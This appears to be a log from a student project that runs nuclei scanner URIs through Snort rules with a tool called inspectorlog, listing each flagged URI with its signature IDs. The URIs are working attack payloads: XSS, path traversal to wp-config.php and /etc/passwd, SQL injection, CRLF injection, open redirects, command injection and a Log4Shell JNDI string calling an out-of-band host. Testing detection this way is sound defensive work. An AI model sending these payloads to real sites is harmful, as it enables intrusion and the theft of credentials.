# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l vulnerabilities.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/inspectorlog/snort/web_estatica/owasp/opensource/nuclei/vulnerabilities.clean
Packet [1]	Uri [/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml]	Nattacks [1]	Signatures	[2017611]
Packet [3]	Uri [/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [10]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [1]	Signatures	[41421]
Packet [13]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [28]	Uri [/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml]	Nattacks [1]	Signatures	[2017611]
Packet [29]	Uri [/web/xmlrpc.php]	Nattacks [1]	Signatures	[2018754]
Packet [33]	Uri [/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [37]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [1]	Signatures	[41421]
Packet [49]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [57]	Uri [/web/xmlrpc.php]	Nattacks [1]	Signatures	[2018754]
Packet [63]	Uri [/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [77]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [78]	Uri [/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [93]	Uri [/web/%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [94]	Uri [/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [98]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd]	Nattacks [1]	Signatures	[2013002]
Packet [112]	Uri [/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [113]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [120]	Uri [/web/%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [133]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd]	Nattacks [1]	Signatures	[2013002]
Packet [135]	Uri [/web/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"]	Nattacks [1]	Signatures	[2009715]
Packet [142]	Uri [/web/guest_auth/poc.php?cmd=cat%20/etc/passwd]	Nattacks [1]	Signatures	[2010920]
Packet [144]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [148]	Uri [/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27]	Nattacks [3]	Signatures	[44472]	[50646]	[2024914]
Packet [157]	Uri [/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd]	Nattacks [1]	Signatures	[2013002]
Packet [159]	Uri [/web/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'']	Nattacks [3]	Signatures	[2006445]	[2011042]	[2017808]
Packet [160]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2016194]
Packet [179]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [185]	Uri [/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd]	Nattacks [1]	Signatures	[2013002]
Packet [193]	Uri [/web/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2015496]
Packet [201]	Uri [/web/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [202]	Uri [/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [206]	Uri [/web/xmlrpc.php]	Nattacks [1]	Signatures	[2018754]
Packet [209]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2016194]
Packet [210]	Uri [/web/wp-content/force-download.php?file=../wp-config.php]	Nattacks [2]	Signatures	[41420]	[2016078]
Packet [214]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [217]	Uri [/web/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [220]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [221]	Uri [/web/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery]	Nattacks [1]	Signatures	[41421]
Packet [227]	Uri [/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b']	Nattacks [3]	Signatures	[2006445]	[2011042]	[2017808]
Packet [239]	Uri [/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [256]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [257]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [267]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [277]	Uri [/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b']	Nattacks [3]	Signatures	[2006445]	[2011042]	[2017808]
Packet [282]	Uri [/web/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [285]	Uri [/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [287]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [288]	Uri [/web/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10]	Nattacks [1]	Signatures	[41420]
Packet [298]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [302]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [313]	Uri [/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [324]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [327]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [334]	Uri [/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [339]	Uri [/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [343]	Uri [/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [374]	Uri [/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [375]	Uri [/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [385]	Uri [/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [392]	Uri [/web/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [414]	Uri [/web/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [416]	Uri [/web/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini]	Nattacks [1]	Signatures	[2019880]
Packet [417]	Uri [/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [432]	Uri [/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[2017143]
Packet [449]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00]	Nattacks [1]	Signatures	[41420]
Packet [450]	Uri [/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [471]	Uri [/web/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [473]	Uri [/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [476]	Uri [/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [480]	Uri [/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[2017143]
Packet [484]	Uri [/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [488]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [503]	Uri [/web/webadmin/authportal/bounce.php?url=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [507]	Uri [/web/%5C%5Cexample.com/%252e%252e%252f]	Nattacks [1]	Signatures	[2019880]
Packet [519]	Uri [/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [521]	Uri [/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [525]	Uri [/web/bitrix/rk.php?goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [533]	Uri [/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [534]	Uri [/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [537]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [538]	Uri [/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [541]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [559]	Uri [/web/webadmin/authportal/bounce.php?url=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [567]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [1]	Signatures	[2009714]
Packet [570]	Uri [/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [572]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [581]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [584]	Uri [/web/bitrix/redirect.php?event3=352513&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [599]	Uri [/web/xmlrpc.php]	Nattacks [1]	Signatures	[2018754]
Packet [604]	Uri [/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php]	Nattacks [2]	Signatures	[41420]	[2014899]
Packet [605]	Uri [/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [613]	Uri [/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [618]	Uri [/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [624]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [1]	Signatures	[2009714]
Packet [627]	Uri [/web/%20../web-inf/web.xml]	Nattacks [1]	Signatures	[2017611]
Packet [631]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [639]	Uri [/web/bitrix/redirect.php?event3=352513&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [641]	Uri [/web/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [647]	Uri [/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [661]	Uri [/web/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[2017143]
Packet [662]	Uri [/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [663]	Uri [/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php]	Nattacks [2]	Signatures	[41420]	[2014899]
Packet [669]	Uri [/web/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[2017143]
Packet [673]	Uri [/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [674]	Uri [/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [691]	Uri [/web/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini]	Nattacks [1]	Signatures	[2025825]
Packet [694]	Uri [/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [703]	Uri [/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [725]	Uri [/web/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [727]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [1]	Signatures	[2009714]
Packet [731]	Uri [/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload]	Nattacks [1]	Signatures	[2009714]
Packet [732]	Uri [/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [742]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [766]	Uri [/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload]	Nattacks [1]	Signatures	[2009714]
Packet [770]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [1]	Signatures	[2009714]
Packet [782]	Uri [/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [4]	Signatures	[34194]	[41421]	[2019137]	[2020221]
Packet [785]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [791]	Uri [/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [792]	Uri [/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [799]	Uri [/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`]	Nattacks [1]	Signatures	[2006446]
Packet [813]	Uri [/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1]	Nattacks [1]	Signatures	[2009714]
Packet [817]	Uri [/web/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [818]	Uri [/web/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [820]	Uri [/web/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [823]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [832]	Uri [/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [4]	Signatures	[34194]	[41421]	[2019137]	[2020221]
Packet [836]	Uri [/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [841]	Uri [/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [842]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [4]	Signatures	[34194]	[41421]	[2019137]	[2020221]
Packet [844]	Uri [/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`]	Nattacks [1]	Signatures	[2006446]
Packet [849]	Uri [/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
